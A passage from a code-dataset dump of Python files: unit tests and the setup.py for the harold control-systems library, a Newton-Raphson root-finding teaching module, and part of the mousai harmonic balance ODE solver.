(3, 3), (5, 2)]
Find = [(1, 4), (4, 1),
(4, 4), (1, 1),
(2, 4), (4, 2),
(2, 4), (4, 2),
(1, 2), (2, 1),
(2, 4), (4, 2)]
for s, sind in ((H, Hind), (F, Find)):
for ind, x in enumerate([s[1, :], s[:, 1],
s[:, :], s[0, 0],
s[1:3, :], s[:, 1:3],
s[[1, 2], :], s[:, [1, 2]],
s[2, [1, 2]], s[[1, 2], 2],
s[::2, :], s[:, ::2]]):
assert_equal(x.shape, sind[ind])
assert_raises(ValueError, H.__setitem__)
def test_model_zeros():
# Test example
A = np.array(
[[-3.93, -0.00315, 0, 0, 0, 4.03E-5, 0, 0, 0],
[368, -3.05, 3.03, 0, 0, -3.77E-3, 0, 0, 0],
[27.4, 0.0787, -5.96E-2, 0, 0, -2.81E-4, 0, 0, 0],
[-0.0647, -5.2E-5, 0, -0.255, -3.35E-6, 3.6e-7, 6.33E-5, 1.94E-4, 0],
[3850, 17.3, -12.8, -12600, -2.91, -0.105, 12.7, 43.1, 0],
[22400, 18, 0, -35.6, -1.04E-4, -0.414, 90, 56.9, 0],
[0, 0, 2.34E-3, 0, 0, 2.22E-4, -0.203, 0, 0],
[0, 0, 0, -1.27, -1.00E-3, 7.86E-5, 0, -7.17E-2, 0],
[-2.2, -177e-5, 0, -8.44, -1.11E-4, 1.38E-5, 1.49E-3, 6.02E-3, -1E-10]
])
B = np.array([[0, 0],
[0, 0],
[1.56, 0],
[0, -5.13E-6],
[8.28, -1.55],
[0, 1.78],
[2.33, 0],
[0, -2.45E-2],
[0, 2.94E-5]
])
C = e_i(9, [5, 8], output='r')
D = np.zeros((2, 2))
zs = transmission_zeros(A, B, C, D)
res = np.array([-2.64128629e+01 - 0j,
-2.93193619 - 0.419522621j,
-9.52183370e-03 + 0j,
-2.93193619 + 0.419522621j,
1.69789270e-01 - 0j,
5.46527700e-01 - 0j])
# Sort is numerically too sensitive for imaginary parts.
assert_almost_equal(np.sort(np.imag(zs)), np.sort(np.imag(res))) # 0.0
assert_almost_equal(np.sort(np.real(zs)), np.sort(np.real(res))) # 0.1
# An example found online (citation lost), please let me know
A = np.array([[-6.5000, 0.5000, 6.5000, -6.5000],
[-0.5000, -5.5000, -5.5000, 5.5000],
[-0.5000, 0.5000, 0.5000, -6.5000],
[-0.5000, 0.5000, -5.5000, -0.5000]])
B = np.array([[0., 1, 0],
[2., 1, 2],
[3., 4, 3],
[3., 2, 3]])
C = np.array([[1, 1, 0, 0]])
D = np.zeros((1, 3))
zs = transmission_zeros(A, B, C, D)
res = np.array([-7, -6])
assert_almost_equal(np.sort(res), np.sort(zs)) # 1
# Example from Reinschke, 1988
A = np.array([[0, 0, 1, 0, 0, 0],
[2, 0, 0, 3, 4, 0],
[0, 0, 5, 0, 0, 6],
[0, 7, 0, 0, 0, 0],
[0, 0, 0, 8, 9, 0],
[0, 0, 0, 0, 0, 0]])
B = np.array([[0, 0, 0, 0, 10, 0], [0, 0, 0, 0, 0, 11]]).T
C = np.array([[0, 12, 0, 0, 13, 0],
[14, 0, 0, 0, 0, 0],
[15, 0, 16, 0, 0, 0]])
D = np.zeros((3, 2))
zs = transmission_zeros(A, B, C, D)
res = np.array([-6.78662791+0.j, 3.09432022+0.j])
assert_almost_equal(np.sort(zs), np.sort(res)) # 2
def test_static_model_conversion_sampling_period():
G = State(np.eye(5), dt=0.001)
H = state_to_transfer(G)
assert_(H._isgain) # 0
assert_(not H._isSISO) # 1
assert_equal(H.SamplingPeriod, 0.001) # 2
K = transfer_to_state(H)
assert_equal(K.SamplingPeriod, 0.001) # 3
def test_random_state_model():
seed(12345)
# Simple arguments
G = random_state_model(0)
assert G._isgain
assert G._isSISO
G = random_state_model(1)
assert not G._isgain
assert G._isSISO
G = random_state_model(1, 1, 2)
assert not G._isgain
assert not G._isSISO
G = random_state_model(5, 2, 4, stable=False)
assert np.any(G.poles.real > 0)
G = random_state_model(11, stable=False, prob_dist=[0, 0, 0.5, 0.5])
assert_array_almost_equal(np.abs(G.poles.real), np.zeros(11))
assert np.any(G.poles.imag)
a1 = random_state_model(101, dt=0.1).poles
assert np.all(np.abs(a1) <= 1.)
def test_basic_pole_properties():
G = Transfer(0.5, [1, 4, 3]) + 5
zzz = G.pole_properties()
assert_array_almost_equal(zzz,
np.array([[-1.+0.j, 1.+0.j, 1.+0.j],
[-3.+0.j, 3.+0.j, 1.+0.j]]))
def test_transfer_to_state():
# Models with static column/row
num, den = [[1, -1], [[1, -1], 0]], [[[1, 2], 1], [[1, 2], 1]]
den2, num2 = [list(i) for i in zip(*den)], [list(i) for i in zip(*num)]
G = Transfer(num, den)
H = Transfer(num2, den2)
Gs = transfer_to_state(G)
Hs = transfer_to_state(H)
Gm = concatenate_state_matrices(Gs)
Hm = concatenate_state_matrices(Hs)
assert_array_almost_equal(Gm, np.array([[-2, 1, 0],
[1, 0, -1],
[-3, 1, 0]]))
assert_array_almost_equal(Hm, np.array([[-2., 0., 1., 0.],
[0., -2., 0., 1.],
[1., -3., 0., 1.],
[0., 0., -1., 0.]]))
# Example from Kalman 1963
num = [[3*np.poly([-3, -5]), [6, 6], [2, 7], [2, 5]],
[2, 1, [2, 10], [8, 16]],
[[2, 14, 36], [-2, 0], 1, 2*np.convolve([5, 17], [1, 2])]]
den = [[np.poly([-1, -2, -4]), [1, 6, 8], [1, 7, 12], [1, 5, 6]],
[[1, 8, 15], [1, 3], np.poly([-1, -2, -3]), np.poly([-1, -3, -5])],
[np.poly([-1, -3, -5]), [1, 4, 3], [1, 3], np.poly([-1, -3, -5])]]
G = Transfer(num, den)
H = transfer_to_state(G)
p = H.poles
p.sort()
assert_array_almost_equal(p, np.array([-5.+0.j, -5.+0.j, -4.+0.j,
-3.+0.j, -3.+0.j, -3.+0.j,
-2.+0.j, -2.+0.j, -1.+0.j,
-1.+0.j, -1.+0.j]))
# Reported in gh-#42
G = Transfer([[[87.8, 8.78], [-103.68, -8.64]],
[[129.84, 10.82], [-109.6, -10.96]]],
[562.5, 82.5, 1])
Gss = transfer_to_state(G)
assert_array_almost_equal(Gss.a, np.kron(np.eye(2), [[0., 1.],
[-2/1125, -11/75]]))
assert_array_almost_equal(Gss.b, [[0, 0], [1, 0], [0, 0], [0, 1]])
des_c = np.array([[0.01560888888888889,
0.1560888888888889,
-0.015360000000000002,
-0.18432],
[0.019235555555555558,
0.23082666666666668,
-0.019484444444444447,
-0.19484444444444443]])
assert_array_almost_equal(Gss.c, des_c)
assert_array_almost_equal(Gss.d, np.zeros([2, 2]))
def test_state_to_transfer():
G = State(-2*np.eye(2), np.eye(2), [[1, -3], [0, 0]], [[0, 1], [-1, 0]])
H = state_to_transfer(G)
H11 = H[1, 1]
assert_array_equal(H11.num, np.array([[0.]]))
assert_array_equal(H11.den, np.array([[1.]]))
```
#### File: josephcslater/harold/setup.py
```python
import sys
import os
from os.path import abspath, dirname
import io
import subprocess
from setuptools import setup
# Borrowing some .git machinery from SciPy's setup.py
if sys.version_info[:2] < (3, 6):
raise RuntimeError("Python version >= 3.6 required.")
MAJOR = 1
MINOR = 0
MICRO = 2
ISRELEASED = False
VERSION = '{}.{}.{}'.format(MAJOR, MINOR, MICRO)
# Return the git revision as a string
def git_version():
def _minimal_ext_cmd(cmd):
# construct minimal environment
env = {}
for k in ['SYSTEMROOT', 'PATH']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = subprocess.Popen(cmd, stdout=subprocess.PIPE,
env=env).communicate()[0]
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
GIT_REVISION = out.strip().decode('ascii')
except OSError:
GIT_REVISION = "Unknown"
return GIT_REVISION
def get_version_info():
FULLVERSION = VERSION
if os.path.exists('.git'):
GIT_REVISION = git_version()
elif os.path.exists('harold/_version.py'):
# must be a source distribution, use existing version file
# load it as a separate module to not load scipy/__init__.py
import imp
version = imp.load_source('harold._version', 'harold/_version.py')
GIT_REVISION = version.git_revision
else:
GIT_REVISION = "Unknown"
if not ISRELEASED:
FULLVERSION += '.dev0+' + GIT_REVISION[:7]
return FULLVERSION, GIT_REVISION
def write_version_py(filename='harold/_version.py'):
FULLVERSION, GIT_REVISION = get_version_info()
s = (f'''# THIS FILE IS AUTO-GENERATED FROM SETUP.PY\n'''
f'''short_version = "{VERSION}"\n'''
f'''version = "{VERSION}"\n'''
f'''full_version = "{FULLVERSION}"\n'''
f'''git_revision = "{GIT_REVISION}"\n'''
f'''release = {ISRELEASED}\n'''
f'''if not release:\n'''
f''' version = full_version\n''')
a = open(filename, 'w')
try:
a.write(s)
finally:
a.close()
# =============================
# Back to setup.py declarations
# =============================
here = abspath(dirname(__file__))
# Get the long description from the relevant file
def read(*filenames, **kwargs):
encoding = kwargs.get('encoding', 'utf-8')
sep = kwargs.get('sep', '\n')
buf = []
for filename in filenames:
with io.open(filename, encoding=encoding) as f:
buf.append(f.read())
return sep.join(buf)
long_description = read('README.rst', 'CHANGES.txt')
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS'
]
def setup_package():
write_version_py()
setup(
name='harold',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/ilayn/harold',
description='A control systems library for Python3',
long_description=long_description,
license='MIT',
classifiers=CLASSIFIERS,
packages=['harold'],
package_dir={'harold': 'harold'},
python_requires='>=3.6',
install_requires=['numpy', 'scipy', 'matplotlib', 'tabulate'],
setup_requires=['pytest-runner'],
tests_require=['numpy', 'pytest'],
keywords='control-theory PID controller design industrial automation',
extras_require={
'dev': ['check-manifest'],
'test': ['coverage'],
'docs': ['sphinx>=1.7.4', 'cloud-sptheme>=1.9.4', 'numpydoc']
},
version=get_version_info()[0]
)
if __name__ == '__main__':
setup_package()
``` |
{
"source": "josephcslater/JupyterExamples",
"score": 5
} |
#### File: josephcslater/JupyterExamples/newton_raphson.py
```python
import matplotlib.pyplot as plt
import scipy as sp
def myfunc(x):
"""
Generic function.
Parameters
----------
x: float or array_like
The value or array at which to calculate the function
Examples
--------
Execution on a float
>>> from newton_raphson import *
>>> myfunc(3.0)
11.0
Execution on a SciPy array_like
>>> a = np.linspace(0,10,10)
>>> myfunc(a)
array([ -4. , -0.54320988, 5.38271605, 13.77777778,
24.64197531, 37.97530864, 53.77777778, 72.04938272,
92.79012346, 116. ])
"""
return x**2+2*x-4
def newton_raphson_plot(function, x0=0, dx=1e-10, eps=1e-10):
"""
Solve for a root of a function using Newton Raphson's method.
Also plots the process.
Parameters
----------
function : string
String with name of function to be solved for *function(x) = 0*
x0 : float
Initial guess for *x* near *function(x) = 0*
dx : float
Delta x used for finite difference calculation of slope
eps : float
Absolute value of *function(x)* which is considered zero.
Examples
--------
>>> from newton_raphson import *
>>> def myfunc(x):
... return x**2+2*x-4
>>> function_name = 'myfunc'
>>> newton_raphson_plot(function_name, x0=2)
(1.23606797..., ...)
"""
deltax = 2 * eps
count = 0
x = x0
y = np.linspace(1, 6, 200)
plt.plot(y, globals()[function](y))
plt.ylabel('$f(x)$')
plt.xlabel('$x$')
plt.title('Newton Raphson search for solution to $f(x)=0$.')
plt.grid(True)
plt.plot(np.array([x0, x0]), np.array([globals()[function](x0), 0]), 'r')
plt.plot(np.array([x0]), np.array([globals()[function](x0)]), 'r*')
while abs(globals()[function](x)) > eps and count < 50:
count += 1
plt.plot(np.array([x, x]), np.array([globals()[function](x), 0]), 'r')
plt.plot(np.array([x]), np.array([globals()[function](x)]), 'r*')
f = globals()[function](x)
f2 = globals()[function](x + dx)
dfdx = (f2 - f) / dx
deltax = -f / dfdx
x = x + deltax
xr = np.linspace(x, x - deltax, 200)
y = xr * dfdx - x * dfdx
plt.plot(xr, y, 'y') # Current point
return x, deltax
def newton_raphson(function, x0=0, dx=1e-10, eps=1e-10):
"""
Solve for a root of a function using Newton Raphson's method.
Parameters
----------
function : string
String with name of function to be solved for *function(x) = 0*
x0 : float
Initial guess for *x* near *function(x) = 0*
dx : float
Delta x used for finite difference calculation of slope
eps : float
Absolute value of *function(x)* which is considered zero.
Examples
--------
>>> from newton_raphson import *
>>> def myfunc(x):
... return x**2+2*x-4
>>> function_name = 'myfunc'
>>> newton_raphson(function_name, x0=2)
(1.2360679..., ...)
"""
deltax = 2*eps
count = 0
x = x0
# loop until it converges, but no more than 50 times
while abs(deltax) > eps and count < 50:
count += 1 # I can add 1 to the variable *count*. Neat Python shortcut.
# This is a comment
# The next line is "Matlab style" and *bad*
#f = eval(function + '('+ str(x) + ')')
f = globals()[function](x) #We explain later.
#f2 = eval(function + '('+ str(x+dx) + ')')
f2 = globals()[function](x+dx)
dfdx = (f2-f)/dx
deltax = -f/dfdx
x = x + deltax
return x, deltax
``` |
{
"source": "josephcslater/mousai",
"score": 3
} |
#### File: mousai/mousai/har_bal.py
```python
import warnings
# import logging
import numpy as np
import scipy as sp
import scipy.fftpack as fftp
import scipy.linalg as la
import inspect
from scipy.optimize import newton_krylov, anderson, broyden1, broyden2, \
excitingmixing, linearmixing, diagbroyden
# logging.basicConfig(level=print)
# Use `logging.debug` in place of print.
# for instance logging.debug(pformat('e {} X {}'.format(e,X)))
# This will output only info and warnings
# logging.basicConfig(level=logging.INFO)
# This will output only warnings
# logging.basicConfig(level=logging.WARNING)
def hb_time(sdfunc, x0=None, omega=1, method='newton_krylov', num_harmonics=1,
num_variables=None, eqform='second_order', params={}, realify=True,
**kwargs):
r"""Harmonic balance solver for first and second order ODEs.
Obtains the solution of a first-order and second-order differential
equation under the presumption that the solution is harmonic using an
algebraic time method.
Returns `t` (time), `x` (displacement), `v` (velocity), and `a`
(acceleration) response of a first- or second- order linear ordinary
differential equation defined by
:math:`\ddot{\mathbf{x}}=f(\mathbf{x},\mathbf{v},\omega)` or
:math:`\dot{\mathbf{x}}=f(\mathbf{x},\omega)`.
For the state space form, the function `sdfunc` should have the form::
def duff_osc_ss(x, params): # params is a dictionary of parameters
omega = params['omega'] # `omega` will be put into the dictionary
# for you
t = params['cur_time'] # The time value is available as
# `cur_time` in the dictionary
xdot = np.array([[x[1]],[-x[0]-.1*x[0]**3-.1*x[1]+1*np.sin(omega*t)]])
return xdot
In a state space form solution, the function must accept the states and the
`params` dictionary. This dictionary should be used to obtain the
prescribed response frequency and the current time. These plus any other
parameters are used to calculate the state derivatives which are returned
by the function.
For the second order form the function `sdfunc` should have the form::
def duff_osc(x, v, params): # params is a dictionary of parameters
omega = params['omega'] # `omega` will be put into the dictionary
# for you
t = params['cur_time'] # The time value is available as
# `cur_time` in the dictionary
return np.array([[-x-.1*x**3-.2*v+np.sin(omega*t)]])
In a second-order form solution the function must take the states and the
`params` dictionary. This dictionary should be used to obtain the
prescribed response frequency and the current time. These plus any other
parameters are used to calculate the state derivatives which are returned
by the function.
Parameters
----------
sdfunc : function
For `eqform='first_order'`, name of function that returns **column
vector** first derivative given `x`, and a dictionry of parameters.
This is *NOT* a string (not the name of the function).
:math:`\dot{\mathbf{x}}=f(\mathbf{x},\omega)`
For `eqform='second_order'`, name of function that returns **column
vector** second derivative given `x`, `v`, and a dictionary of
parameters. This is *NOT* a string.
:math:`\ddot{\mathbf{x}}=f(\mathbf{x},\mathbf{v},\omega)`
x0 : array_like, somewhat optional
n x m array where n is the number of equations and m is the number of
values representing the repeating solution.
It is required that :math:`m = 1 + 2 num_{harmonics}`. (we will
generalize allowable default values later.)
omega : float
assumed fundamental response frequency in radians per second.
method : str, optional
Name of optimization method to be used.
num_harmonics : int, optional
Number of harmonics to presume. The omega = 0 constant term is always
presumed to exist. Minimum (and default) is 1. If num_harmonics*2+1
exceeds the number of columns of `x0` then `x0` will be expanded, using
Fourier analaysis, to include additional harmonics with the starting
presumption of zero values.
num_variables : int, somewhat optional
Number of states for a state space model, or number of generalized
dispacements for a second order form.
If `x0` is defined, num_variables is inferred. An error will result if
both `x0` and num_variables are left out of the function call.
`num_variables` must be defined if `x0` is not.
eqform : str, optional
`second_order` or `first_order`. (second order is default)
params : dict, optional
Dictionary of parameters needed by sdfunc.
realify : boolean, optional
Force the returned results to be real.
other : any
Other keyword arguments available to nonlinear solvers in
`scipy.optimize.nonlin
<https://docs.scipy.org/doc/scipy/reference/optimize.nonlin.html>`_.
See `Notes`.
Returns
-------
t, x, e, amps, phases : array_like
time, displacement history (time steps along columns), errors,
amps : float array
amplitudes of displacement (primary harmonic) in column vector format.
phases : float array
amplitudes of displacement (primary harmonic) in column vector format.
Examples
--------
>>> import mousai as ms
>>> t, x, e, amps, phases = ms.hb_time(ms.duff_osc,
... np.array([[0,1,-1]]),
... omega = 0.7)
Notes
-----
.. seealso::
``hb_freq``
This method is not reliable for a low number of harmonics.
Calls a linear algebra function from
`scipy.optimize.nonlin
<https://docs.scipy.org/doc/scipy/reference/optimize.nonlin.html>`_ with
`newton_krylov` as the default.
Evaluates the differential equation/s at evenly spaced points in time. Each
point in time yields a single equation. One harmonic plus the constant term
results in 3 points in time over the cycle.
Solver should gently "walk" solution up to get to nonlinearities for hard
nonlinearities.
Algorithm:
1. calls `hb_err` with `x` as the variable to solve for.
2. `hb_err` uses a Fourier representation of `x` to obtain
velocities (after an inverse FFT) then calls `sdfunc` to determine
accelerations.
3. Accelerations are also obtained using a Fourier representation of x
4. Error in the accelerations (or state derivatives) are the functional
error used by the nonlinear algebraic solver
(default `newton_krylov`) to be minimized by the solver.
Options to the nonlinear solvers can be passed in by \*\*kwargs (keyword
arguments) identical to those available to the nonlinear solver.
"""
# Initial conditions exist?
if x0 is None:
if num_variables is not None:
x0 = np.zeros((num_variables, 1 + num_harmonics * 2))
else:
print('Error: Must either define number of variables or initial\
guess for x.')
return
elif num_harmonics is None:
num_harmonics = int((x0.shape[1] - 1) / 2)
elif 1 + 2 * num_harmonics > x0.shape[1]:
x_freq = fftp.fft(x0)
x_zeros = np.zeros((x0.shape[0], 1 + num_harmonics * 2 - x0.shape[1]))
x_freq = np.insert(x_freq, [x0.shape[1] - x0.shape[1] // 2], x_zeros,
axis=1)
x0 = fftp.ifft(x_freq) * (1 + num_harmonics * 2) / x0.shape[1]
x0 = np.real(x0)
if isinstance(sdfunc, str):
sdfunc = globals()[sdfunc]
print("sdfunc is expected to be a function name, not a string")
params['function'] = sdfunc # function that returns SO derivative
time = np.linspace(0, 2 * np.pi / omega, num=x0.shape[1], endpoint=False)
params['time'] = time
params['omega'] = omega
params['n_har'] = num_harmonics
def hb_err(x):
r"""Array (vector) of hamonic balance second order algebraic errors.
Given a set of second order equations
:math:`\ddot{x} = f(x, \dot{x}, \omega, t)`
calculate the error :math:`E = \ddot{x} - f(x, \dot{x}, \omega, t)`
presuming that :math:`x` can be represented as a Fourier series, and
thus :math:`\dot{x}` and :math:`\ddot{x}` can be obtained from the
Fourier series representation of :math:`x`.
Parameters
----------
x : array_like
x is an :math:`n \\times m` by 1 array of presumed displacements.
It must be a "list" array (not a linear algebra vector). Here
:math:`n` is the number of displacements and :math:`m` is the
number of times per cycle at which the displacement is guessed
(minimum of 3)
params : dictionary
Because this function will be called by one of the scipy.optimize
root finders, it must be a function of only `x`. However, for
generality it need to be built based on user defined variables.
These variables must be in the scope of memory when the function is
created. For conveience they are stored in the variable `params`.
1. `function`: the function which returns the numerically
calculated state derivatives (or second derivatives) given the
states (or states and first derivatives).
2. `omega`: which is the defined fundamental harmonic
at which the solution is desired.
3. `n_har`: an integer representing the number of harmonics.
Note that `m` above is equal to 1 + 2 * `n_har`.
Returns
-------
e : array_like
2d array of numerical error of presumed solution(s) `x`.
Notes
-----
`function` and `omega` are not separately defined arguments so as to
enable algebraic solver functions to call `hb_time_err` cleanly.
The algorithm is broadly as follows:
1. The velocity or accelerations are calculated in the same shape
as `x` as the variables `vel` and `accel`, one column for each
time step.
3. Each column of `x` and `v` are sent with `t`, `omega`, and other
`**kwargs** to `function` with the results
agregated into the columns of `accel_num`.
4. The difference between `accel_num` and `accel` or
`velocity_num` and `velocity` represent the error used
by the numerical algebraic equation solver.
"""
nonlocal params # Will stay out of global/conflicts
n_har = params['n_har']
omega = params['omega']
time = params['time']
m = 1 + 2 * n_har
vel = harmonic_deriv(omega, x)
if eqform == 'second_order':
accel = harmonic_deriv(omega, vel)
accel_from_deriv = np.zeros_like(accel)
# Should subtract in place below to save memory for large problems
for i in np.arange(m):
# This should enable t to be used for current time in loops
# might be able to be commented out, left as example
t = time[i]
params['cur_time'] = time[i] # loops
# Note that everything in params can be accessed within
# `function`.
accel_from_deriv[:, i] = params['function'](x[:, i], vel[:, i],
params)[:, 0]
e = accel_from_deriv - accel
elif eqform == 'first_order':
vel_from_deriv = np.zeros_like(vel)
# Should subtract in place below to save memory for large problems
for i in np.arange(m):
# This should enable t to be used for current time in loops
t = time[i]
params['cur_time'] = time[i]
# Note that everything in params can be accessed within
# `function`.
vel_from_deriv[:, i] =\
params['function'](x[:, i], params)[:, 0]
e = vel_from_deriv - vel
else:
print('eqform cannot have a value of {}', eqform)
return 0, 0, 0, 0, 0
return e
try:
x = globals()[method](hb_err, x0, **kwargs)
except:
x = x0 # np.full([x0.shape[0],x0.shape[1]],np.nan)
amps = np.full([x0.shape[0], ], np.nan)
phases = np.full([x0.shape[0], ], np.nan)
e = hb_err(x) # np.full([x0.shape[0],x0.shape[1]],np.nan)
raise
else:
xhar = fftp.fft(x) * 2 / len(time)
amps = np.absolute(xhar[:, 1])
phases = np.angle(xhar[:, 1])
e = hb_err(x)
if realify is True:
x = np.real(x)
else:
print('x was real')
return time, x, e, amps, phases
def hb_freq(sdfunc, x0=None, omega=1, method='newton_krylov', num_harmonics=1,
num_variables=None, mask_constant=True, eqform='second_order',
params={}, realify=True, num_time_steps=51, **kwargs):
r"""Harmonic balance solver for first and second order ODEs.
Obtains the solution of a first-order and second-order differential
equation under the presumption that the solution is harmonic using an
algebraic time method.
Returns `t` (time), `x` (displacement), `v` (velocity), and `a`
(acceleration) response of a first or second order linear ordinary
differential equation defined by
:math:`\ddot{\mathbf{x}}=f(\mathbf{x},\mathbf{v},\omega)` or
:math:`\dot{\mathbf{x}}=f(\mathbf{x},\omega)`.
For the state space form, the function `sdfunc` should have the form::
def duff_osc_ss(x, params): # params is a dictionary of parameters
omega = params['omega'] # `omega` will be put into the dictionary
# for you
t = params['cur_time'] # The time value is available as
# `cur_time` in the dictionary
x_dot = np.array([[x[1]],
[-x[0]-.1*x[0]**3-.1*x[1]+1*np.sin(omega*t)]])
return x_dot
In a state space form solution, the function must take the states and the
`params` dictionary. This dictionary should be used to obtain the
prescribed response frequency and the current time. These plus any other
parameters are used to calculate the state derivatives which are returned
by the function.
For the second order form the function `sdfunc` should have the form::
def duff_osc(x, v, params): # params is a dictionary of parameters
omega = params['omega'] # `omega` will be put into the dictionary
# for you
t = params['cur_time'] # The time value is available as
# `cur_time` in the dictionary
return np.array([[-x-.1*x**3-.2*v+np.sin(omega*t)]])
In a second-order form solution the function must take the states and the
`params` dictionary. This dictionary should be used to obtain the
prescribed response frequency and the current time. These plus any other
parameters are used to calculate the state derivatives which are returned
by the function.
Parameters
----------
sdfunc : function
For `eqform='first_order'`, name of function that returns **column
vector** first derivative given `x`, and a dictionry of parameters.
This is *NOT* a string (not the name of the function).
:math:`\dot{\mathbf{x}}=f(\mathbf{x},\omega)`
For `eqform='second_order'`, name of function that returns **column
vector** second derivative given `x`, `v`, `omega` and \*\*kwargs. This
is *NOT* a string.
:math:`\ddot{\mathbf{x}}=f(\mathbf{x},\mathbf{v},\omega)`
x0 : array_like, somewhat optional
n x m array where n is the number of equations and m is the number of
values representing the repeating solution.
It is required that :math:`m = 1 + 2 num_{harmonics}`. (we will
generalize allowable default values later.)
omega : float
assumed fundamental response frequency in radians per second.
method : str, optional
Name of optimization method to be used.
num_harmonics : int, optional
Number of harmonics to presume. The `omega` = 0 constant term is always
presumed to exist. Minimum (and default) is 1. If num_harmonics*2+1
exceeds the number of columns of `x0` then `x0` will be expanded, using
Fourier analaysis, to include additional harmonics with the starting
presumption of zero values.
num_variables : int, somewhat optional
Number of states for a state space model, or number of generalized
dispacements for a second order form.
If `x0` is defined, num_variables is inferred. An error will result if
both `x0` and num_variables are left out of the function call.
`num_variables` must be defined if `x0` is not.
eqform : str, optional
`second_order` or `first_order`. (`second order` is default)
params : dict, optional
Dictionary of parameters needed by sdfunc.
realify : boolean, optional
Force the returned results to be real.
mask_constant : boolean, optional
Force the constant term of the series representation to be zero.
num_time_steps : int, default = 51
number of time steps to use in time histories for derivative
calculations.
other : any
Other keyword arguments available to nonlinear solvers in
`scipy.optimize.nonlin
<https://docs.scipy.org/doc/scipy/reference/optimize.nonlin.html>`_.
See Notes.
Returns
-------
t, x, e, amps, phases : array_like
time, displacement history (time steps along columns), errors,
amps : float array
amplitudes of displacement (primary harmonic) in column vector format.
phases : float array
amplitudes of displacement (primary harmonic) in column vector format.
Examples
--------
>>> import mousai as ms
>>> t, x, e, amps, phases = ms.hb_freq(ms.duff_osc,
... np.array([[0,1,-1]]),
... omega = 0.7)
Notes
-----
.. seealso::
`hb_time`
Calls a linear algebra function from
`scipy.optimize.nonlin
<https://docs.scipy.org/doc/scipy/reference/optimize.nonlin.html>`_ with
`newton_krylov` as the default.
Evaluates the differential equation/s at evenly spaced points in time
defined by the user (default 51). Uses error in FFT of derivative
(acceeration or state equations) calculated based on:
1. governing equations
2. derivative of `x` (second derivative for state method)
Solver should gently "walk" solution up to get to nonlinearities for hard
nonlinearities.
Algorithm:
1. calls `hb_time_err` with x as the variable to solve for.
2. `hb_time_err` uses a Fourier representation of x to obtain
velocities (after an inverse FFT) then calls `sdfunc` to determine
accelerations.
3. Accelerations are also obtained using a Fourier representation of x
4. Error in the accelerations (or state derivatives) are the functional
error used by the nonlinear algebraic solver
(default `newton_krylov`) to be minimized by the solver.
Options to the nonlinear solvers can be passed in by \*\*kwargs.
"""
# Initial conditions exist?
if x0 is None:
if num_variables is not None:
x0 = np.zeros((num_variables, 1 + num_harmonics * 2))
x0 = x0 + np.random.randn(*x0.shape)
else:
print('Error: Must either define number of variables or initial\
guess for x.')
return
elif num_harmonics is None:
num_harmonics = int((x0.shape[1] - 1) / 2)
elif 1 + 2 * num_harmonics > x0.shape[1]:
x_freq = fftp.fft(x0)
x_zeros = np.zeros((x0.shape[0], 1 + num_harmonics * 2 - x0.shape[1]))
x_freq = np.insert(x_freq, [x0.shape[1] - x0.shape[1] // 2], x_zeros,
axis=1)
x0 = fftp.ifft(x_freq) * (1 + num_harmonics * 2) / x0.shape[1]
x0 = np.real(x0)
if isinstance(sdfunc, str):
sdfunc = globals()[sdfunc]
print("sdfunc is expected to be a function name, not a string")
params['function'] = sdfunc # function that returns SO derivative
time = np.linspace(0, 2 * np.pi / omega, num=x0.shape[1], endpoint=False)
params['time'] = time
params['omega'] = omega
params['n_har'] = num_harmonics
X0 = fftp.rfft(x0)
if mask_constant is True:
X0 = X0[:, 1:]
params['mask_constant'] = mask_constant
def hb_err(X):
"""Return errors in equation eval versus derivative calculation."""
# r"""Array (vector) of hamonic balance second order algebraic errors.
#
# Given a set of second order equations
# :math:`\ddot{x} = f(x, \dot{x}, \omega, t)`
# calculate the error :math:`E = \mathcal{F}(\ddot{x}
# - \mathcal{F}\left(f(x, \dot{x}, \omega, t)\right)`
# presuming that :math:`x` can be represented as a Fourier series, and
# thus :math:`\dot{x}` and :math:`\ddot{x}` can be obtained from the
# Fourier series representation of :math:`x` and :math:`\mathcal{F}(x)`
# represents the Fourier series of :math:`x(t)`
#
# Parameters
# ----------
# X : float array
# X is an :math:`n \\times m` by 1 array of sp.fft.rfft
# fft coefficients lacking the constant (first) element.
# Here :math:`n` is the number of displacements and :math:`m` 2
# times the number of harmonics to be solved for.
#
# **kwargs : string, float, variable
# **kwargs is a packed set of keyword arguments with 3 required
# arguments.
# 1. `function`: a string name of the function which returned
# the numerically calculated acceleration.
#
# 2. `omega`: which is the defined fundamental harmonic
# at which the is desired.
#
# 3. `n_har`: an integer representing the number of harmonics.
# Note that `m` above is equal to 2 * `n_har`.
#
# Returns
# -------
# e : float array
# 2d array of numerical errors of presumed solution(s) `X`. Error
# between first (or second) derivative via Fourier analysis and via
# solution of the governing equation.
#
# Notes
# -----
# `function` and `omega` are not separately defined arguments so as to
# enable algebraic solver functions to call `hb_err` cleanly.
#
# The algorithm is as follows:
# 1. X is prepended with a zero vector (to represent the constant
# value)
# 2. `x` is calculated via an inverse `numpy.fft.rfft`
# 1. The velocity and accelerations are calculated in the same
# shape as `x` as `vel` and `accel`.
# 3. Each column of `x` and `v` are sent with `t`, `omega`, and
# other `**kwargs** to `function` one at a time with the results
# agregated into the columns of `accel_num`.
# 4. The rfft is taken of `accel_num` and `accel`.
# 5. The first column is stripped out of both `accel_num_freq and
# `accel_freq`.
# """
nonlocal params # Will stay out of global/conflicts
omega = params['omega']
time = params['time']
mask_constant = params['mask_constant']
if mask_constant is True:
X = np.hstack((np.zeros_like(X[:, 0]).reshape(-1, 1), X))
x = fftp.irfft(X)
time_e, x = time_history(time, x, num_time_points=num_time_steps)
vel = harmonic_deriv(omega, x)
m = num_time_steps
if eqform == 'second_order':
accel = harmonic_deriv(omega, vel)
accel_from_deriv = np.zeros_like(accel)
# Should subtract in place below to save memory for large problems
for i in np.arange(m):
# This should enable t to be used for current time in loops
# might be able to be commented out, left as example
# t = time_e[i]
params['cur_time'] = time_e[i] # loops
